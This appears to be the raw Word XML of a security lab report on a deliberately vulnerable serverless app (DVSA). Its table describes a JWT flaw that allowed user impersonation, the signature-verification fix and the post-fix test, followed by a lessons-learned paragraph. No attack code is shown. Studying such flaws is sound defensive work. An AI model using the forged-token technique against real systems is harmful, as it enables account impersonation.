        <w:gridCol w:w="1472"/>
        <w:gridCol w:w="1570"/>
      </w:tblGrid>
      <w:tr w:rsidR="007A6D07" w14:paraId="76CA67A6" w14:textId="77777777" w:rsidTr="007A6D07">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1503" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F402AC4" w14:textId="2B6A2B3C" w:rsidR="007A6D07" w:rsidRDefault="007A6D07" w:rsidP="00BA72A1">
            <w:r>
              <w:t>Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1501" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6BB58ADA" w14:textId="59267A70" w:rsidR="007A6D07" w:rsidRDefault="007A6D07" w:rsidP="007A6D07">
            <w:r w:rsidRPr="007A6D07">
              <w:t>Why This Is a Deviation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1503" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E9CAB62" w14:textId="19D58B0C" w:rsidR="007A6D07" w:rsidRDefault="007A6D07" w:rsidP="007A6D07">
            <w:r w:rsidRPr="007A6D07">
              <w:t>Deviation Class</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1503" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="128DC4CD" w14:textId="77777777" w:rsidR="007A6D07" w:rsidRDefault="007A6D07" w:rsidP="007A6D07">
            <w:r w:rsidRPr="007A6D07">
              <w:t>Fix</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Applied</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B678E84" w14:textId="63C3B740" w:rsidR="007A6D07" w:rsidRDefault="007A6D07" w:rsidP="007A6D07">
            <w:r>
              <w:t>(where)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1503" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5ED33578" w14:textId="70139375" w:rsidR="007A6D07" w:rsidRDefault="007A6D07" w:rsidP="007A6D07">
            <w:r w:rsidRPr="007A6D07">
              <w:t>Post-Fix Verification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1739" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67B71C6D" w14:textId="0FD3B43A" w:rsidR="007A6D07" w:rsidRDefault="007A6D07" w:rsidP="007A6D07">
            <w:r w:rsidRPr="007A6D07">
              <w:t>Optional Latency Be fore / After Logging</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A6D07" w14:paraId="346904DB" w14:textId="77777777" w:rsidTr="007A6D07">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1503" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4DF73447" w14:textId="080629D1" w:rsidR="007A6D07" w:rsidRDefault="001519ED" w:rsidP="001519ED">
            <w:r w:rsidRPr="001519ED">
              <w:t>Broken Authentication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1501" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F9D7411" w14:textId="5257854B" w:rsidR="007A6D07" w:rsidRDefault="001519ED" w:rsidP="001519ED">
            <w:r w:rsidRPr="001519ED">
              <w:t>The backend trusted identity claims from an unverified JWT, allowing attackers to impersonate another user</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1503" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="767A75B5" w14:textId="162E2EF8" w:rsidR="007A6D07" w:rsidRDefault="001519ED" w:rsidP="001519ED">
            <w:r w:rsidRPr="001519ED">
              <w:t>Intentional misuse / security-relevant abuse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1503" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5302902C" w14:textId="0EB25DB5" w:rsidR="007A6D07" w:rsidRDefault="001519ED" w:rsidP="001519ED">
            <w:r w:rsidRPr="001519ED">
              <w:t>Lambda (DVSA-ORDER-MANAGER, order-manager.js) — added JWT signature verification using JWKS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1503" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2461C5B9" w14:textId="43B71E0F" w:rsidR="007A6D07" w:rsidRDefault="001519ED" w:rsidP="001519ED">
            <w:r w:rsidRPr="001519ED">
              <w:t>Forged token is rejected with “invalid token”; valid tokens require proper verification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1739" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="55EB0699" w14:textId="48E4E80A" w:rsidR="007A6D07" w:rsidRDefault="001519ED" w:rsidP="001519ED">
            <w:r w:rsidRPr="001519ED">
              <w:t>~120ms / 130ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="46AEC6D9" w14:textId="77777777" w:rsidR="00BA72A1" w:rsidRDefault="00BA72A1" w:rsidP="00BA72A1"/>
    <w:p w14:paraId="7AAF151D" w14:textId="77777777" w:rsidR="00BA72A1" w:rsidRDefault="00BA72A1" w:rsidP="00BA72A1"/>
    <w:p w14:paraId="45AF4BB3" w14:textId="77777777" w:rsidR="00BA72A1" w:rsidRDefault="00BA72A1" w:rsidP="00BA72A1"/>
    <w:p w14:paraId="70E163AC" w14:textId="77777777" w:rsidR="00BA72A1" w:rsidRDefault="00BA72A1" w:rsidP="00BA72A1"/>
    <w:p w14:paraId="19F2D1DB" w14:textId="7EA07071" w:rsidR="00956299" w:rsidRDefault="00956299" w:rsidP="00956299">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00956299">
        <w:t>Takeaway / Lessons Learned</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7A6B52" w14:textId="1633A1BD" w:rsidR="004D266F" w:rsidRPr="004D266F" w:rsidRDefault="004D266F" w:rsidP="001C6047">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="004D266F">
        <w:t xml:space="preserve">This lesson highlights that JWT tokens must never be trusted without verifying their signature. Simply decoding the payload exposes the system to identity manipulation attacks. In serverless </w:t>
      </w:r>
      <w:r w:rsidR="001C6047" w:rsidRPr="004D266F">
        <w:t>architecture</w:t>
      </w:r>
      <w:r w:rsidRPr="004D266F">
        <w:t>, improper authentication can lead to serious security breaches such as unauthorized data access and account impersonation. The correct approach is to enforce cryptographic verification of tokens and validate critical claims before using them.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="004D266F" w:rsidRPr="004D266F" w:rsidSect="000A57D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BA7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="31C81FAE"/>
    <w:lvl w:ilvl="0" w:tplc="2F202BBC">
      <w:start w:val="5"/>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31B50"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A43ADE72"/>
    <w:lvl w:ilvl="0" w:tplc="B5BA2292">
      <w:start w:val="8"/>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4B170F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5B82E242"/>
    <w:lvl w:ilvl="0" w:tplc="38822450">
      <w:start w:val="4"/>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BD4ECA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A2FC2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8D1ED9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6854C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533C5B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="75A49D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514000"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1430C1D0"/>
    <w:lvl w:ilvl="0" w:tplc="241E09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8285038"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="34367130"/>
    <w:lvl w:ilvl="0" w:tplc="DAF47334">
      <w:start w:val="9"/>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E52144"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E626E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5D25F5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D826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70341"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0E74CD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39762C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2876B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033359"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0E263E4C"/>
    <w:lvl w:ilvl="0" w:tplc="397CA8E0">
      <w:start w:val="1"/>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C544DD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="13C6DA46"/>
    <w:lvl w:ilvl="0" w:tplc="E5CA34DA">
      <w:start w:val="7"/>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2A463F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BAFE5424"/>
    <w:lvl w:ilvl="0" w:tplc="4ED47D16">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:sz w:val="44"/>
        <w:szCs w:val="4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AB7353"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2AE86CD8"/>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213267"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="530C69A6"/>
    <w:lvl w:ilvl="0" w:tplc="5386C422">
      <w:start w:val="3"/>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947D80"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A58EC3F0"/>
    <w:lvl w:ilvl="0" w:tplc="83248F16">
      <w:start w:val="6"/>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EE67A8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="165889A8"/>
    <w:lvl w:ilvl="0" w:tplc="C86E9D9C">
      <w:start w:val="2"/>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8102762">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="379283219">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="462114230">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1307512281">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="475538599">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="780494637">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1139763358">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="149761307">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1891768054">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="553077378">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="314800575">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="314725528">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1621033580">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="165747684">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="57097251">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="618223875">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="2082218497">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="491681737">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="5478856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B04"/>
    <w:rsid w:val="0009190F"/>
    <w:rsid w:val="000A57D4"/>
    <w:rsid w:val="000C6563"/>
    <w:rsid w:val="00142AD2"/>
    <w:rsid w:val="001519ED"/>
    <w:rsid w:val="00170B48"/>
    <w:rsid w:val="00184249"/>
    <w:rsid w:val="001B6F08"/>
    <w:rsid w:val="001C3229"/>
    <w:rsid w:val="001C6047"/>
    <w:rsid w:val="001D6BCB"/>
    <w:rsid w:val="00210805"/>
    <w:rsid w:val="00240380"/>
    <w:rsid w:val="00291336"/>
    <w:rsid w:val="002C2284"/>
    <w:rsid w:val="002D0436"/>
    <w:rsid w:val="002E6C08"/>
    <w:rsid w:val="00344EB7"/>
    <w:rsid w:val="003C232C"/>
    <w:rsid w:val="003F62E7"/>
    <w:rsid w:val="00421E72"/>
    <w:rsid w:val="00467607"/>
    <w:rsid w:val="00485BF3"/>
    <w:rsid w:val="004A150F"/>
    <w:rsid w:val="004D266F"/>
    <w:rsid w:val="00506A62"/>
    <w:rsid w:val="00514B52"/>
    <w:rsid w:val="005763B3"/>
    <w:rsid w:val="00576C3F"/>
    <w:rsid w:val="005A10AE"/>
    <w:rsid w:val="005C76E2"/>
    <w:rsid w:val="005F2D61"/>
    <w:rsid w:val="00706843"/>
    <w:rsid w:val="00712B53"/>
    <w:rsid w:val="007265E6"/>
    <w:rsid w:val="0075506F"/>
    <w:rsid w:val="007669BB"/>
    <w:rsid w:val="00792587"/>
    <w:rsid w:val="007A5D1E"/>
    <w:rsid w:val="007A6D07"/>
    <w:rsid w:val="007D682F"/>
    <w:rsid w:val="007F1665"/>
    <w:rsid w:val="00800261"/>
    <w:rsid w:val="00863689"/>
    <w:rsid w:val="008A3F14"/>
    <w:rsid w:val="008A71D9"/>
    <w:rsid w:val="008B5C46"/>
    <w:rsid w:val="008C0319"/>
    <w:rsid w:val="008D3221"/>
    <w:rsid w:val="00956299"/>
    <w:rsid w:val="009A083D"/>
    <w:rsid w:val="009D6AE6"/>
    <w:rsid w:val="009E4A75"/>
    <w:rsid w:val="00A65256"/>
    <w:rsid w:val="00A937FA"/>
    <w:rsid w:val="00AA14EA"/>
    <w:rsid w:val="00B673EF"/>
    <w:rsid w:val="00B73AF3"/>
    <w:rsid w:val="00B9204F"/>
    <w:rsid w:val="00B942F5"/>
    <w:rsid w:val="00BA687B"/>
    <w:rsid w:val="00BA72A1"/>
    <w:rsid w:val="00BB2A62"/>
    <w:rsid w:val="00C06B04"/>
    <w:rsid w:val="00C62578"/>
    <w:rsid w:val="00C86308"/>
    <w:rsid w:val="00CF3286"/>
    <w:rsid w:val="00D372F5"/>
    <w:rsid w:val="00D40C4E"/>
    <w:rsid w:val="00D84B64"/>
    <w:rsid w:val="00DA5A76"/>
    <w:rsid w:val="00E16056"/>
    <w:rsid w:val="00E223AA"/>
    <w:rsid w:val="00E738FA"/>
    <w:rsid w:val="00ED15C6"/>
    <w:rsid w:val="00EF4AD6"/>
    <w:rsid w:val="00F24FB8"/>
    <w:rsid w:val="00FB28D9"/>
    <w:rsid w:val="00FC5C3C"/>
    <w:rsid w:val="00FD2D5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08070"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{DBD19FAC-6F11-419D-8EFE-DB2F017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B04"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00C06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B04"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00C06B04"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00C06B04"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00C06B04"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00C06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B04"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00C06B04"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00CF3286"/>
    <w:rPr>
      <w:color w:val="467886" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00CF3286"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="007A6D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84B64"/>
    <w:pPr>
      <w:spacing w:after="200" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0E2841" w:themeColor="text2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00FD2D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D2D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h3x14rchv6.execute-api.us-east-1.amazonaws.com/dvsa/order" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dvsa-website-test-546079881937-us-east-1.s3-website.us-east-1.amazonaws.com/"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TotalTime>
  <Pages>10</Pages>
  <Words>792</Words>
  <Characters>4519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REDHA ABDULAZIZ ALTURAIK</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>REDHA ABDULAZIZ ALTURAIK</cp:lastModifiedBy>
  <cp:revision>72</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-04-07T14:40:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-18T14:43:00Z</dcterms:modified>
</cp:coreProperties>
</file>